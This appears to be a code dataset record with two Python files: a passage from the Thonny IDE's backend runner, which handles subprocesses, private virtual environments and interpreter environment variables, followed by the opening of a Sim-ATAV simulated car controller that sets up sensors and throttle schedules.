get_workbench().get_option("run.run_in_terminal_keep_open"),
)
def _cmd_interrupt(self) -> None:
if self._proxy is not None:
self._proxy.interrupt()
else:
logging.warning("Interrupting without proxy")
def _cmd_interrupt_enabled(self) -> bool:
if not self._proxy or not self._proxy.is_functional():
return False
# TODO: distinguish command and Ctrl+C shortcut
widget = get_workbench().focus_get()
if not running_on_mac_os(): # on Mac Ctrl+C is not used for Copy
if widget is not None and hasattr(widget, "selection_get"):
try:
selection = widget.selection_get()
if isinstance(selection, str) and len(selection) > 0:
# assuming user meant to copy, not interrupt
# (IDLE seems to follow same logic)
return False
except Exception:
# selection_get() gives error when calling without selection on Ubuntu
pass
# TODO: should it be get_runner().is_waiting_toplevel_command() ??
return True
def cmd_stop_restart(self) -> None:
self.restart_backend(True)
def _poll_vm_messages(self) -> None:
"""I chose polling instead of event_generate in listener thread,
because event_generate across threads is not reliable
http://www.thecodingforums.com/threads/more-on-tk-event_generate-and-threads.359615/
"""
self._polling_after_id = None
if self._pull_vm_messages() is False:
return
self._polling_after_id = get_workbench().after(50, self._poll_vm_messages)
def _pull_vm_messages(self):
while self._proxy is not None:
try:
msg = self._proxy.fetch_next_message()
if not msg:
break
logging.debug(
"RUNNER GOT: %s, %s in state: %s",
msg.event_type,
msg,
self.get_state(),
)
except BackendTerminatedError as exc:
self._report_backend_crash(exc)
self.destroy_backend()
return False
if msg.get("SystemExit", False):
self.restart_backend(True)
return False
# change state
if isinstance(msg, ToplevelResponse):
self._set_state("waiting_toplevel_command")
elif isinstance(msg, DebuggerResponse):
self._set_state("waiting_debugger_command")
else:
"other messages don't affect the state"
if "cwd" in msg:
get_workbench().set_cwd(msg["cwd"])
# Publish the event
# NB! This may cause another command to be sent before we get to postponed commands.
try:
self._publishing_events = True
class_event_type = type(msg).__name__
get_workbench().event_generate(class_event_type, event=msg) # more general event
if msg.event_type != class_event_type:
# more specific event
get_workbench().event_generate(msg.event_type, event=msg)
finally:
self._publishing_events = False
# TODO: is it necessary???
# https://stackoverflow.com/a/13520271/261181
# get_workbench().update()
self._send_postponed_commands()
def _report_backend_crash(self, exc: Exception) -> None:
err = "Backend terminated (returncode: %s)\n" % getattr(exc, "returncode", "?")
try:
faults_file = os.path.join(THONNY_USER_DIR, "backend_faults.log")
if os.path.exists(faults_file):
with open(faults_file, encoding="ASCII") as fp:
err += fp.read()
except Exception:
logging.exception("Failed retrieving backend faults")
err = err.strip() + "\nUse 'Stop/Restart' to restart the backend ...\n"
get_workbench().event_generate("ProgramOutput", stream_name="stderr", data=err)
get_workbench().become_active_window()
def restart_backend(
self, clean: bool, first: bool = False, wait: float = 0
) -> None:
"""Recreate (or replace) backend proxy / backend process."""
if not first:
get_shell().restart()
get_shell().update_idletasks()
self.destroy_backend()
backend_name = get_workbench().get_option("run.backend_name")
if backend_name not in get_workbench().get_backends():
raise UserError(
"Can't find backend '{}'. Please select another backend from options".format(
backend_name
)
)
backend_class = get_workbench().get_backends()[backend_name].proxy_class
self._set_state("running")
self._proxy = None
self._proxy = backend_class(clean)
self._poll_vm_messages()
if wait:
start_time = time.time()
while (
not self.is_waiting_toplevel_command()
and time.time() - start_time <= wait
):
# self._pull_vm_messages()
get_workbench().update()
sleep(0.01)
get_workbench().event_generate("BackendRestart")
def destroy_backend(self) -> None:
if self._polling_after_id is not None:
get_workbench().after_cancel(self._polling_after_id)
self._polling_after_id = None
self._postponed_commands = []
if self._proxy:
self._proxy.destroy()
self._proxy = None
def get_local_executable(self) -> Optional[str]:
if self._proxy is None:
return None
else:
return self._proxy.get_local_executable()
def get_backend_proxy(self) -> "BackendProxy":
return self._proxy
def _check_alloc_console(self) -> None:
if sys.executable.endswith("thonny.exe") or sys.executable.endswith(
"pythonw.exe"
):
# These don't have console allocated.
# Console is required for sending interrupts.
# AllocConsole would be easier but flashes console window
import ctypes
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
exe = sys.executable.replace("thonny.exe", "python.exe").replace(
"pythonw.exe", "python.exe"
)
cmd = [exe, "-c", "print('Hi!'); input()"]
child = subprocess.Popen(
cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
child.stdout.readline()
result = kernel32.AttachConsole(child.pid)
if not result:
err = ctypes.get_last_error()
logging.info("Could not allocate console. Error code: " + str(err))
child.stdin.write(b"\n")
try:
child.stdin.flush()
except Exception:
# May happen eg. when installation path has "&" in it
# See https://bitbucket.org/plas/thonny/issues/508/cant-allocate-windows-console-when
# Without flush the console window becomes visible, but Thonny can be still used
logging.getLogger("thonny").exception(
"Problem with finalizing console allocation"
)
def get_supported_features(self) -> Set[str]:
if self._proxy is None:
return set()
else:
return self._proxy.get_supported_features()
def using_venv(self) -> bool:
return isinstance(self._proxy, CPythonProxy) and self._proxy.in_venv
class BackendProxy:
"""Communicates with backend process.
All communication methods must be non-blocking,
ie. suitable for calling from GUI thread."""
# backend_name will be overwritten on Workbench.add_backend
# Subclasses don't need to worry about it.
backend_name = None
def __init__(self, clean: bool) -> None:
"""Initializes (or starts the initialization of) the backend process.
Backend is considered ready when the runner gets a ToplevelResponse
with attribute "welcome_text" from fetch_next_message.
"""
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
method_name = "_cmd_" + cmd.name
if hasattr(self, method_name):
return getattr(self, method_name)(cmd)
else:
return "discard"
def send_program_input(self, data: str) -> None:
"""Send input data to backend"""
raise NotImplementedError()
def fetch_next_message(self):
"""Read next message from the queue or None if queue is empty"""
raise NotImplementedError()
def run_script_in_terminal(self, script_path, interactive, keep_open):
raise NotImplementedError()
def get_sys_path(self):
"backend's sys.path"
return []
def get_backend_name(self):
return type(self).backend_name
def interrupt(self):
"""Tries to interrupt current command without reseting the backend"""
pass
def destroy(self):
"""Called when Thonny no longer needs this instance
(Thonny gets closed or new backend gets selected)
"""
pass
def is_functional(self):
"""Used in MicroPython proxies"""
return True
def get_local_executable(self):
"""Return system command for invoking current interpreter"""
return None
def get_supported_features(self):
return {"run"}
class CPythonProxy(BackendProxy):
"abstract class"
def __init__(self, executable):
super().__init__(True)
self._executable = executable
self._proc = None
self._message_queue = None
self._sys_path = []
self._usersitepackages = None
self._gui_update_loop_id = None
self.in_venv = None
self._start_new_process()
def fetch_next_message(self):
if not self._message_queue or len(self._message_queue) == 0:
if self._proc is not None:
retcode = self._proc.poll()
if retcode is not None:
raise BackendTerminatedError(retcode)
return None
msg = self._message_queue.popleft()
self._store_state_info(msg)
if msg.event_type == "ProgramOutput":
# combine available output messages to one single message,
# in order to put less pressure on UI code
while True:
if len(self._message_queue) == 0:
return msg
else:
next_msg = self._message_queue.popleft()
if (
next_msg.event_type == "ProgramOutput"
and next_msg["stream_name"] == msg["stream_name"]
):
msg["data"] += next_msg["data"]
else:
# not same type of message, put it back
self._message_queue.appendleft(next_msg)
return msg
else:
return msg
def _store_state_info(self, msg):
if "gui_is_active" in msg:
self._update_gui_updating(msg)
if "in_venv" in msg:
self.in_venv = msg["in_venv"]
if "path" in msg:
self._sys_path = msg["path"]
if "usersitepackages" in msg:
self._usersitepackages = msg["usersitepackages"]
if "prefix" in msg:
self._sys_prefix = msg["prefix"]
if "exe_dirs" in msg:
self._exe_dirs = msg["exe_dirs"]
def send_command(self, cmd):
if isinstance(cmd, ToplevelCommand) and cmd.name[0].isupper():
self._close_backend()
self._start_new_process(cmd)
self._send_msg(cmd)
def _send_msg(self, msg):
self._proc.stdin.write(serialize_message(msg) + "\n")
self._proc.stdin.flush()
def send_program_input(self, data):
self._send_msg(InputSubmission(data))
def get_sys_path(self):
return self._sys_path
def interrupt(self):
if self._proc is not None and self._proc.poll() is None:
if running_on_windows():
try:
os.kill(
self._proc.pid, signal.CTRL_BREAK_EVENT
) # @UndefinedVariable
except Exception:
logging.exception("Could not interrupt backend process")
else:
self._proc.send_signal(signal.SIGINT)
def destroy(self):
self._close_backend()
def _close_backend(self):
self._cancel_gui_update_loop()
if self._proc is not None and self._proc.poll() is None:
self._proc.kill()
self._proc = None
self._message_queue = None
def _start_new_process(self, cmd=None):
# deque, because in one occasion I need to put messages back
self._message_queue = collections.deque()
# prepare environment
my_env = get_environment_for_python_subprocess(self._executable)
# variables controlling communication with the back-end process
my_env["PYTHONIOENCODING"] = "utf-8"
# Let back-end know about plug-ins
my_env["THONNY_USER_DIR"] = THONNY_USER_DIR
if get_workbench().in_debug_mode():
my_env["THONNY_DEBUG"] = "1"
elif "THONNY_DEBUG" in my_env:
del my_env["THONNY_DEBUG"]
if not os.path.exists(self._executable):
raise UserError(
"Interpreter (%s) not found. Please recheck corresponding option!"
% self._executable
)
import thonny.backend_launcher
cmd_line = [
self._executable,
"-u", # unbuffered IO
"-B", # don't write pyo/pyc files
# (to avoid problems when using different Python versions without write permissions)
thonny.backend_launcher.__file__,
]
if hasattr(cmd, "filename"):
cmd_line.append(cmd.filename)
if hasattr(cmd, "args"):
cmd_line.extend(cmd.args)
if hasattr(cmd, "environment"):
my_env.update(cmd.environment)
creationflags = 0
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
debug("Starting the backend: %s %s", cmd_line, get_workbench().get_cwd())
self._proc = subprocess.Popen(
cmd_line,
# bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=get_workbench().get_cwd(),
env=my_env,
universal_newlines=True,
creationflags=creationflags,
)
# send init message
self._send_msg({"frontend_sys_path": sys.path})
if cmd:
# Consume the ready message, cmd will get its own result message
ready_line = self._proc.stdout.readline()
if ready_line == "": # There was some problem
error_msg = self._proc.stderr.read()
raise Exception("Error starting backend process: " + error_msg)
self._store_state_info(parse_message(ready_line))
# setup asynchronous output listeners
Thread(target=self._listen_stdout, daemon=True).start()
Thread(target=self._listen_stderr, daemon=True).start()
def _listen_stdout(self):
# debug("... started listening to stdout")
# will be called from separate thread
def publish_as_msg(data):
msg = parse_message(data)
if "cwd" in msg:
self.cwd = msg["cwd"]
self._message_queue.append(msg)
if len(self._message_queue) > 100:
# Probably backend runs an infinite/long print loop.
# Throttle message thougput in order to keep GUI thread responsive.
sleep(0.1)
while True:
data = self._proc.stdout.readline()
# debug("... read some stdout data", repr(data))
if data == "":
break
else:
try:
publish_as_msg(data)
except Exception:
traceback.print_exc()
# Can mean the line was from subprocess,
# which can't be captured by stream faking.
# NB! If subprocess printed it without linebreak,
# then the suffix can be thonny message
parts = data.rsplit(common.MESSAGE_MARKER, maxsplit=1)
# print first part as it is
self._message_queue.append(
BackendEvent(
"ProgramOutput", data=parts[0], stream_name="stdout"
)
)
if len(parts) == 2:
second_part = common.MESSAGE_MARKER + parts[1]
try:
publish_as_msg(second_part)
except Exception:
# just print ...
self._message_queue.append(
BackendEvent(
"ProgramOutput",
data=second_part,
stream_name="stdout",
)
)
def _listen_stderr(self):
# stderr is used only for debugger debugging
while True:
data = self._proc.stderr.readline()
if data == "":
break
else:
self._message_queue.append(
BackendEvent("ProgramOutput", stream_name="stderr", data=data)
)
def get_local_executable(self):
return self._executable
def get_site_packages(self):
# NB! site.sitepackages may not be present in virtualenv
for d in self._sys_path:
if ("site-packages" in d or "dist-packages" in d) and path_startswith(
d, self._sys_prefix
):
return d
return None
def get_user_site_packages(self):
return self._usersitepackages
def get_exe_dirs(self):
return self._exe_dirs
def _update_gui_updating(self, msg):
"""Enables running Tkinter or Qt programs which doesn't call mainloop.
When mainloop is omitted, then program can be interacted with
from the shell after it runs to the end.
Each ToplevelResponse is supposed to tell, whether gui is active
and needs updating.
"""
if not "gui_is_active" in msg:
return
if msg["gui_is_active"] and self._gui_update_loop_id is None:
# Start updating
self._loop_gui_update(True)
elif not msg["gui_is_active"] and self._gui_update_loop_id is not None:
self._cancel_gui_update_loop()
def _loop_gui_update(self, force=False):
if force or get_runner().is_waiting_toplevel_command():
self.send_command(InlineCommand("process_gui_events"))
self._gui_update_loop_id = get_workbench().after(50, self._loop_gui_update)
def _cancel_gui_update_loop(self):
if self._gui_update_loop_id is not None:
try:
get_workbench().after_cancel(self._gui_update_loop_id)
finally:
self._gui_update_loop_id = None
def run_script_in_terminal(self, script_path, args, interactive, keep_open):
cmd = [self._executable]
if interactive:
cmd.append("-i")
cmd.append(os.path.basename(script_path))
cmd.extend(args)
run_in_terminal(cmd, os.path.dirname(script_path),
keep_open=keep_open)
def get_supported_features(self):
return {"run", "debug", "run_in_terminal", "pip_gui", "system_shell"}
class PrivateVenvCPythonProxy(CPythonProxy):
def __init__(self, clean):
self._prepare_private_venv()
CPythonProxy.__init__(self, get_private_venv_executable())
def _prepare_private_venv(self):
path = get_private_venv_path()
if os.path.isdir(path) and os.path.isfile(os.path.join(path, "pyvenv.cfg")):
self._check_upgrade_private_venv(path)
else:
self._create_private_venv(
path, "Please wait!\nThonny prepares its virtual environment."
)
def _check_upgrade_private_venv(self, path):
# If home is wrong then regenerate
# If only micro version is different, then upgrade
info = _get_venv_info(path)
if not is_same_path(info["home"], os.path.dirname(sys.executable)):
self._create_private_venv(
path,
"Thonny's virtual environment was created for another interpreter.\n"
+ "Regenerating the virtual environment for current interpreter.\n"
+ "(You may need to reinstall your 3rd party packages)\n"
+ "Please wait!.",
clear=True,
)
else:
venv_version = tuple(map(int, info["version"].split(".")))
sys_version = sys.version_info[:3]
assert venv_version[0] == sys_version[0]
assert venv_version[1] == sys_version[1]
if venv_version[2] != sys_version[2]:
self._create_private_venv(
path,
"Please wait!\nUpgrading Thonny's virtual environment.",
upgrade=True,
)
def _create_private_venv(self, path, description, clear=False, upgrade=False):
# Don't include system site packages
# This way all students will have similar configuration
# independently of system Python (if Thonny is used with system Python)
# NB! Cant run venv.create directly, because in Windows
# it tries to link venv to thonny.exe.
# Need to run it via proper python
args = ["-m", "venv"]
if clear:
args.append("--clear")
if upgrade:
args.append("--upgrade")
try:
# pylint: disable=unused-variable
import ensurepip # @UnusedImport
except ImportError:
args.append("--without-pip")
args.append(path)
proc = create_frontend_python_process(args)
from thonny.ui_utils import SubprocessDialog
dlg = SubprocessDialog(
get_workbench(), proc, "Preparing the backend", long_description=description
)
try:
ui_utils.show_dialog(dlg)
except Exception:
# if using --without-pip the dialog may close very quickly
# and for some reason wait_window would give error then
logging.exception("Problem with waiting for venv creation dialog")
get_workbench().become_active_window() # Otherwise focus may get stuck somewhere
bindir = os.path.dirname(get_private_venv_executable())
# create private env marker
marker_path = os.path.join(bindir, "is_private")
with open(marker_path, mode="w") as fp:
fp.write("# This file marks Thonny-private venv")
# Create recommended pip conf to get rid of list deprecation warning
# https://github.com/pypa/pip/issues/4058
pip_conf = "pip.ini" if running_on_windows() else "pip.conf"
with open(os.path.join(path, pip_conf), mode="w") as fp:
fp.write("[list]\nformat = columns")
assert os.path.isdir(path)
class SameAsFrontendCPythonProxy(CPythonProxy):
def __init__(self, clean):
CPythonProxy.__init__(self, get_frontend_python())
def fetch_next_message(self):
msg = super().fetch_next_message()
if msg and "welcome_text" in msg:
if using_bundled_python():
msg["welcome_text"] += " (bundled)"
else:
msg["welcome_text"] += " (" + self._executable + ")"
return msg
class CustomCPythonProxy(CPythonProxy):
def __init__(self, clean):
executable = get_workbench().get_option("CustomInterpreter.path")
# Rembember the usage of this non-default interpreter
used_interpreters = get_workbench().get_option("CustomInterpreter.used_paths")
if executable not in used_interpreters:
used_interpreters.append(executable)
get_workbench().set_option("CustomInterpreter.used_paths", used_interpreters)
CPythonProxy.__init__(self, executable)
def fetch_next_message(self):
msg = super().fetch_next_message()
if msg and "welcome_text" in msg:
msg["welcome_text"] += " (" + self._executable + ")"
return msg
def get_private_venv_path():
if "thonny" in sys.executable.lower():
prefix = "BundledPython"
else:
prefix = "Python"
return os.path.join(
THONNY_USER_DIR, prefix + "%d%d" % (sys.version_info[0], sys.version_info[1])
)
def get_private_venv_executable():
venv_path = get_private_venv_path()
if running_on_windows():
exe = os.path.join(venv_path, "Scripts", WINDOWS_EXE)
else:
exe = os.path.join(venv_path, "bin", "python3")
return exe
def _get_venv_info(venv_path):
cfg_path = os.path.join(venv_path, "pyvenv.cfg")
result = {}
with open(cfg_path, encoding="UTF-8") as fp:
for line in fp:
if "=" in line:
key, val = line.split("=", maxsplit=1)
result[key.strip()] = val.strip()
return result
def using_bundled_python():
return is_bundled_python(sys.executable)
def is_bundled_python(executable):
return os.path.exists(
os.path.join(os.path.dirname(executable), "thonny_python.ini")
)
def create_backend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. pip) on CPython backend.
Assumes current backend is CPython."""
# TODO: if backend == frontend, then delegate to create_frontend_python_process
python_exe = get_runner().get_local_executable()
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
# TODO: remove frontend python from path and add backend python to it
return _create_python_process(python_exe, args, stdin, stdout, stderr, env=env)
def create_frontend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. for installing plug-ins on by the plug-ins)"""
python_exe = get_frontend_python().replace("pythonw.exe", "python.exe")
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
return _create_python_process(python_exe, args, stdin, stdout, stderr)
def _create_python_process(
python_exe,
args,
stdin=None,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=False,
env=None,
universal_newlines=True,
):
cmd = [python_exe] + args
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
startupinfo = None
creationflags = 0
proc = subprocess.Popen(
cmd,
stdin=stdin,
stdout=stdout,
stderr=stderr,
shell=shell,
env=env,
universal_newlines=universal_newlines,
startupinfo=startupinfo,
creationflags=creationflags,
)
proc.cmd = cmd
return proc
class BackendTerminatedError(Exception):
def __init__(self, returncode):
Exception.__init__(self)
self.returncode = returncode
def get_frontend_python():
return (sys.executable
.replace("thonny.exe", "python.exe")
.replace("pythonw.exe", "python.exe"))
def is_venv_interpreter_of_current_interpreter(executable):
for location in [".", ".."]:
cfg_path = os.path.join(location, "pyvenv.cfg")
if os.path.isfile(cfg_path):
with open(cfg_path) as fp:
content = fp.read()
for line in content.splitlines():
if line.replace(" ", "").startswith("home="):
_, home = line.split("=", maxsplit=1)
home = home.strip()
if os.path.isdir(home) and os.path.samefile(home, sys.prefix):
return True
return False
def get_environment_for_python_subprocess(target_executable):
overrides = get_environment_overrides_for_python_subprocess(target_executable)
return get_environment_with_overrides(overrides)
def get_environment_with_overrides(overrides):
env = os.environ.copy()
for key in overrides:
if overrides[key] is None and key in env:
del env[key]
else:
assert isinstance(overrides[key], str)
if key.upper() == "PATH":
update_system_path(env, overrides[key])
else:
env[key] = overrides[key]
return env
def get_environment_overrides_for_python_subprocess(target_executable):
"""Take care of not not confusing different interpreter
with variables meant for bundled interpreter"""
# At the moment I'm tweaking the environment only if current
# exe is bundled for Thonny.
# In remaining cases it is user's responsibility to avoid
# calling Thonny with environment which may be confusing for
# different Pythons called in a subprocess.
this_executable = sys.executable.replace("pythonw.exe", "python.exe")
target_executable = target_executable.replace("pythonw.exe", "python.exe")
interpreter_specific_keys = ["TCL_LIBRARY", "TK_LIBRARY",
"LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH",
"SSL_CERT_DIR", "SSL_CERT_FILE",
"PYTHONHOME", "PYTHONPATH",
"PYTHONNOUSERSITE", "PYTHONUSERBASE"]
result = {}
if (os.path.samefile(target_executable, this_executable)
or is_venv_interpreter_of_current_interpreter(target_executable)):
# bring out some important variables so that they can
# be explicitly set in macOS Terminal
# (If they are set then it's most likely because current exe is in Thonny bundle)
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = os.environ[key]
# never pass some variables to different interpreter
# (even if it's venv or symlink to current one)
if not is_same_path(target_executable, this_executable):
for key in ["PYTHONPATH", "PYTHONHOME",
"PYTHONNOUSERSITE", "PYTHONUSERBASE"]:
if key in os.environ:
result[key] = None
else:
# interpreters are not related
# interpreter specific keys most likely would confuse other interpreter
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = None
# some keys should be never passed
for key in ["PYTHONSTARTUP", "PYTHONBREAKPOINT", "PYTHONDEBUG",
"PYTHONNOUSERSITE", "PYTHONASYNCIODEBUG"]:
if key in os.environ:
result[key] = None
# venv may not find (correct) Tk without assistance (eg. in Ubuntu)
if is_venv_interpreter_of_current_interpreter(target_executable):
try:
if ("TCL_LIBRARY" not in os.environ
or "TK_LIBRARY" not in os.environ):
result["TCL_LIBRARY"] = get_workbench().tk.exprstring("$tcl_library")
result["TK_LIBRARY"] = get_workbench().tk.exprstring("$tk_library")
except Exception:
logging.exception("Can't compute Tcl/Tk library location")
return result
|
automated_driving_with_fusion2_5.py | """Defines SimpleSensorFusionControl class
----------------------------------------------------------------------------------------------------------
This file is part of Sim-ATAV project and licensed under MIT license.
Copyright (c) 2018 Cumhur Erkan Tuncali, Georgios Fainekos, Danil Prokhorov, Hisahiro Ito, James Kapinski.
For questions please contact:
C. Erkan Tuncali (etuncali [at] asu.edu)
----------------------------------------------------------------------------------------------------------
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
import math
import numpy as np
import threading
import pickle
from Sim_ATAV.common.controller_communication_interface import ControllerCommunicationInterface
from Sim_ATAV.vehicle_control.base_controller.base_controller import BaseCarController
from Sim_ATAV.vehicle_control.controller_commons import controller_commons
from Sim_ATAV.vehicle_control.controller_commons.path_following_tools import PathFollowingTools
from Sim_ATAV.vehicle_control.controller_commons.perception.sensor_fusion.sensor_fusion_tracker \
import SensorFusionTracker
from Sim_ATAV.vehicle_control.controller_commons.planning.target_speed_planner import TargetSpeedPlanner,\
TargetSpeedData
from Sim_ATAV.vehicle_control.generic_stanley_controller.generic_stanley_controller \
import GenericStanleyController
from Sim_ATAV.vehicle_control.generic_pid_controller.generic_pid_controller import GenericPIDController
from Sim_ATAV.vehicle_control.controller_commons.visualization.camera_info_display import CameraInfoDisplay
WORLD_TIME_STEP_MS = 10
HAS_DEBUG_DISPLAY = True
SENSOR_TYPE = 'Actual' # 'Actual', 'Perfect'
DEBUG_MODE = False
# Our global variables
target_throttle = [0.5, 0.55, 0.6, -0.2, 0.2, 0.2, 0.25, 0.75, 0.85, -0.2, 0.85, 0.0, 0.0, 0.9, 0.45, -0.4, -0.2, 0.85, 0.95, 0.0, 0.45, 0.5, 0.5, 0.9, 0.55, 0.0, 0.25, 0.25, 0.25, -0.4, 0.0, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2]
target_t = [0.87, 1.45, 1.92, 2.38, 2.85, 3.3, 3.74, 4.14, 4.5, 4.85, 5.2, 5.54, 5.88, 6.21, 6.52, 6.85, 7.21, 7.56, 7.88, 8.19, 8.5, 8.8, 9.09, 9.37, 9.64, 9.91, 10.18, 10.45, 10.72, 11.01, 11.31, 11.61, 11.91, 12.21, 12.51, 12.81, 13.11, 13.41, 13.71, 14.01, 14.31, 14.61, 14.91, 15.21, 15.51, 15.81, 16.11, 16.41, 16.71, 17.01, 17.31, 17.61, 17.91, 18.21, 18.51, 18.81, 19.11, 19.41, 19.71, 20.01, 20.31, 20.61, 20.91, 21.21, 21.51, 21.81, 22.11, 22.41, 22.71, 23.01, 23.31, 23.61, 23.91, 24.21, 24.51, 24.81, 25.11, 25.41, 25.71]
exp_out = [[]]
time_index = 0
img_cnt = 1
data_dict = {}
inf = 1e9
def debug_print(print_str):
if DEBUG_MODE:
print(print_str)
sys.stdout.flush()
class PathAndSpeedFollower(BaseCarController):
"""PathAndSpeedFollower class is a car controller class for Webots."""
CAMERA_TO_FRONT_DISTANCE = 2.3 # 2.3 m is the distance from Prius top sensor location to the very front of the car
LIDAR_TO_FRONT_DISTANCE = 2.3
CAMERA_MAIN_RELATIVE_POSITION = [0.0, 1.3]
LIDAR_MAIN_RELATIVE_POSITION = [0.0, 1.3]
RADAR_FRONT_RELATIVE_POSITION = [0.0, 3.6]
FRONT_TO_REAR_WHEELS_DISTANCE = 3.6 # Approximate (this is intentially longer than the actual wheel base
# for smoother operation)
CAMERA_LOCAL_COORDINATES = [0.0, 1.3, 1.1]
CAMERA_X_ROT_ANGLE = -0.01
CAMERA_LOCAL_ROTATION = np.array([[1.0, 0.0, 0.0],
[0.0, math.cos(CAMERA_X_ROT_ANGLE), -math.sin(CAMERA_X_ROT_ANGLE)],
[0.0, math.sin(CAMERA_X_ROT_ANGLE), math.cos(CAMERA_X_ROT_ANGLE)]])
CAR_FRONT_TRIANGLE_LINE1_M = -192/126 # old value: -0.6 # Line 1 m for front triangle.
CAR_FRONT_TRIANGLE_LINE1_B = 1142.9 # Old value: 526 # Line 1 b for front triangle.
CAR_FRONT_TRIANGLE_LINE2_M = 192/126 # old value: 0.6 # Line 2 m for front triangle.
CAR_FRONT_TRIANGLE_LINE2_B = -758.9 # Old value: -202 # Line 2 b for front triangle.
PED_FRONT_TRIANGLE_LINE1_M = -192/204 # old value: -0.6 # Line 1 m for front triangle.
PED_FRONT_TRIANGLE_LINE1_B = 779.3 # Old value: 526 # Line 1 b for front triangle.
PED_FRONT_TRIANGLE_LINE2_M = 192/204 # old value: 0.6 # Line 2 m for front triangle.
PED_FRONT_TRIANGLE_LINE2_B = -395.3 # Old value: -202 # Line 2 b for front triangle.
CLASSIFIER_PERIOD_MS = 100
LIDAR_PERIOD_MS = 200
RADAR_PERIOD_MS = 200
MIN_EMERGENCY_BRAKE_DURATION_MS = 100.0
MEASURE_EXEC_TIME = False
LANE_WIDTH = 3.5
MIN_STEERING_MANEUVER_MS = 2000.0
EMERGENCY_STEERING_TTC = 1.0
OBJECT_TRACKER_MAX_DISTANCE = 70.0
def __init__(self, controller_parameters):
(car_model, target_speed_m_s, is_direct_speed_control, target_lat_pos, self_vhc_id, slow_at_intersection,
use_fusion) = controller_parameters
BaseCarController.__init__(self, car_model)
self.slow_at_intersection = slow_at_intersection in ('True', 'true', 'yes', 'Yes')
self.is_direct_speed_control = is_direct_speed_control in ('True', 'true', 'yes', 'Yes')
self.use_fusion = use_fusion in ('True', 'true', 'yes', 'Yes')
self.camera_device_name = 'camera'
self.camera = None
self.compass_device_name = 'compass'
self.compass = None
self.display_device_name = 'display'
self.display = None
self.camera_info_display = None
self.sensor_display_device_name = 'sensor_display'
self.sensor_display = None
self.sensor_info_display = None
self.gps_device_name = 'gps'
self.gps = None
self.receiver_device_name = 'receiver'
self.receiver = None
self.emitter_device_name = 'emitter'
self.emitter = None
self.lidar_main_device_name = 'velodyne' # ibeo', 'velodyne'
self.lidar_main = None
self.radar_front_device_name = 'radar'
self.radar_front = None
self.target_speed_m_s = float(target_speed_m_s)
self.classifier = None
self.classification_client = None
self.obj_tracker = None
self.ground_truth_generator = None
self.contr_comm = ControllerCommunicationInterface()
self.target_lat_pos = float(target_lat_pos)
self.target_bearing = 0.0
self.lateral_controller = GenericStanleyController()
self.lateral_controller.k = 0.5
self.lateral_controller.k2 = 0.4
self.lateral_controller.k3 = 1.1
self.lateral_controller.set_output_range(-0.8, 0.8)
self.longitudinal_controller = GenericPIDController(0.15, 0.01, 0.0)
self.longitudinal_controller.set_integrator_value_range(-20.0, 20.0)
self.self_vhc_id = int(self_vhc_id)
self.path_following_tools = PathFollowingTools()
self.self_sensor_fusion_tracker = None
self.last_segment_ind = 0
self.self_current_state = [0.0, 0.0, 0.0, 0.0, 0.0]
self.last_segment_ind = 0
self.detour_start_time = None
self.target_speed_planner = TargetSpeedPlanner(default_speed=self.target_speed_m_s)
print('AutomatedDrivingControl Initialized: {}, {}'.format(car_model, self.target_speed_m_s))
def start_devices(self):
"""Start the devices on the car and initialize objects like classifier."""
# Start camera and the sensors:
self.camera = self.getCamera(self.camera_device_name)
if self.camera is not None:
self.camera.enable(self.CLASSIFIER_PERIOD_MS)
self.camera_info_display = CameraInfoDisplay(self.display)
self.gps = self.getGPS(self.gps_device_name)
if self.gps is not None:
self.gps.enable(WORLD_TIME_STEP_MS)
self.compass = self.getCompass(self.compass_device_name)
if self.compass is not None:
self.compass.enable(WORLD_TIME_STEP_MS)
self.receiver = self.getReceiver(self.receiver_device_name)
if self.receiver is not None:
self.receiver.enable(WORLD_TIME_STEP_MS)
self.emitter = self.getEmitter(self.emitter_device_name)
# Start the car engine
self.start_car()
def run(self):
"""Runs the controller."""
self.start_devices()
print("Devices Started.")
sys.stdout.flush()
def get_self_position():
"""Returns current self position."""
return self.self_current_state[0:2]
def get_self_speed_ms():
"""Returns current speed in m/s."""
return self.self_current_state[2]
def get_self_yaw_angle():
"""Returns self yaw angle in radians."""
return self.self_current_state[3]
# Internal functions to keep the code more readable:
def read_gps_sensor(gps_device):
"""Reads GPS sensor."""
if gps_device is not None:
sensor_gps_speed_m_s = gps_device.getSpeed()
sensor_gps_position_m = gps_device.getValues()
else:
sensor_gps_speed_m_s = 0.0
sensor_gps_position_m = [0.0, 0.0, 0.0]
return sensor_gps_position_m, sensor_gps_speed_m_s
def read_compass_sensor(compass_device):
"""Reads Compass Sensor."""
if compass_device is not None:
sensor_compass_bearing_rad = controller_commons.get_bearing(compass_device)
else:
sensor_compass_bearing_rad = 0.0
